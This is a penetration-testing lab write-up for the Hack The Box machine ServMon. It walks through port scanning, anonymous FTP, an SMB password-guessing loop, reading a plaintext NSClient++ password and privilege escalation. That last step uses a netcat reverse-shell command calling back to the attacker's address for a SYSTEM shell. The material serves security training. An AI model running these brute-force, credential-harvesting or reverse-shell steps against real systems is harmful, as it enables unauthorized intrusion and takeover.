[HTB] ServMon — Writeup

Initial Recon

Nmap

$ nmap -Pn --open -sC -sV -p- 10.10.10.184PORT      STATE SERVICE       VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20 11:05AM <DIR> Users
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
| 256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_ 256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
80/tcp open http
| fingerprint-strings:
| GetRequest, HTTPOptions, RTSPRequest:
| HTTP/1.1 200 OK
| Content-type: text/html
| Content-Length: 340
| Connection: close
| AuthInfo:
| <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
| <html xmlns="http://www.w3.org/1999/xhtml">
| <head>
| <title></title>
| <script type="text/javascript">
| window.location.href = "Pages/login.htm";
| </script>
| </head>
| <body>
| </body>
| </html>
| NULL:
| HTTP/1.1 408 Request Timeout
| Content-type: text/html
| Content-Length: 0
| Connection: close
|_ AuthInfo:
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5040/tcp open unknown
5666/tcp open tcpwrapped
6063/tcp open x11?
6699/tcp open napster?
7680/tcp open pando-pub?
8443/tcp open ssl/https-alt
| fingerprint-strings:
| FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
| HTTP/1.1 404
| Content-Length: 18
| Document not found
| GetRequest:
| HTTP/1.1 302
| Content-Length: 0
|_ Location: /index.html
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after: 2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
Host script results:
|_clock-skew: 5m04s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-11-24T04:50:05
|_ start_date: N/A

Interesting Ports to Note

root@kali:~/Documents/htb/box/servmon# smbmap -H 10.10.10.184
[!] Authentication error on 10.10.10.184
root@kali:~/Documents/htb/box/servmon# smbclient -N -L //10.10.10.184
session setup failed: NT_STATUS_ACCESS_DENIED

Initial Foothold

Anonymous FTP

ftp 10.10.10.184
Connected to 10.10.10.184.
220 Microsoft FTP Service
Name (10.10.10.184:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20 11:05AM <DIR> Users
226 Transfer complete.
ftp> cd Users
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20 11:06AM <DIR> Nadine
01-18-20 11:08AM <DIR> Nathan
226 Transfer complete.
ftp> cd Nadine
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20 11:08AM 174 Confidential.txt
226 Transfer complete.
ftp> get Confidential.txt
local: Confidential.txt remote: Confidential.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
174 bytes received in 0.08 secs (2.1471 kB/s)
ftp> cd ..
250 CWD command successful.
ftp> cd Nathan
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20 11:10AM 186 Notes to do.txt
226 Transfer complete.
ftp> get Notes\ to\ do.txt
local: to remote: 'Notes
200 PORT command successful.
550 The system cannot find the file specified.
$ cat Confidential.txt
Nathan,
I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.RegardsNadine
$ cat Notes\ to\ do.txt 
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

NVMS-1000 Directory Traversal Vulnerability

SMB Password Guessing

$while read i; do echo "[INFO] Password: $i" && smbclient.py servmon/nathan:$i@10.10.10.184; done < pass.txt [INFO] Password: 1nsp3ctTh3Way2Mars!
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[-] SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
[INFO] Password: Th3r34r3To0M4nyTrait0r5!
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[-] SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
[INFO] Password: B3WithM30r4ga1n5tMe
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[-] SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
[INFO] Password: L1k3B1gBut7s@W0rk
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[-] SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
[INFO] Password: 0nly7h3y0unGWi11F0l10w
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[-] SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
[INFO] Password: IfH3s4b0Utg0t0H1sH0me
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[-] SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
[INFO] Password: Gr4etN3w5w17hMySk1Pa5$
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[-] SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
$ while read i; do echo "[INFO] Password: $i" && smbclient.py servmon/nadine:$i@10.10.10.184; done < pass.txt [INFO] Password: 1nsp3ctTh3Way2Mars!
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[-] SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
[INFO] Password: Th3r34r3To0M4nyTrait0r5!
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[-] SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
[INFO] Password: B3WithM30r4ga1n5tMe
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[-] SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
[INFO] Password: L1k3B1gBut7s@W0rk
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
Type help for list of commands

SSH Login

user.txt

root@kali:~/Documents/htb/box/servmon# ssh nadine@10.10.10.184
nadine@10.10.10.184's password:
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

nadine@SERVMON C:\Users\Nadine>cd desktop
nadine@SERVMON C:\Users\Nadine\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 728C-D22C

Directory of C:\Users\Nadine\Desktop

08/04/2020 21:28 <DIR> .
08/04/2020 21:28 <DIR> ..
24/11/2020 04:43 34 user.txt
1 File(s) 34 bytes
2 Dir(s) 27,726,118,912 bytes free

nadine@SERVMON C:\Users\Nadine\Desktop>type user.txt
190d ***REDACTED*** ec7f

Privilege Escalation

Nadine –> SYSTEM (NSClient++ Privilege Escalation)

nadine@SERVMON C:\Program Files\NSClient++>nscp web -- password --display
Current password: ew2x6SsGTxjRwXOT
nadine@SERVMON C:\Program Files\NSClient++>type nsclient.ini
´╗┐# If you want to fill this file with all available options run the following command:
# nscp settings --generate --add-defaults --load-all
# If you want to activate a module and bring in all its options use:
# nscp settings --activate-module <MODULE NAME> --add-defaults
# For details run: nscp settings --help
; in flight - TODO
[/settings/default]
; Undocumented key
password = ew2x6SsGTxjRwXOT
; Undocumented key
allowed hosts = 127.0.0.1
nadine@SERVMON C:\Program Files\NSClient++>
ssh> -L 8443:127.0.0.1:8443
Forwarding port.
@echo off
c:\temp\nc.exe -e cmd.exe 10.10.14.22 443

root.txt

root@kali:~/Documents/htb/box/servmon# nc -lvnp 443
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.184.
Ncat: Connection from 10.10.10.184:50197.
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Program Files\NSClient++>whoami
whoami
nt authority\system
C:\Program Files\NSClient++>type c:\Users\Administrator\Desktop\root.txt
type c:\Users\Administrator\Desktop\root.txt
6353 ***REDACTED*** 0e42

OSCE | OSCP | CREST | Offensive Security Consultant — All about Penetration Test | Red Team | Cloud Security | Web Application Security

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store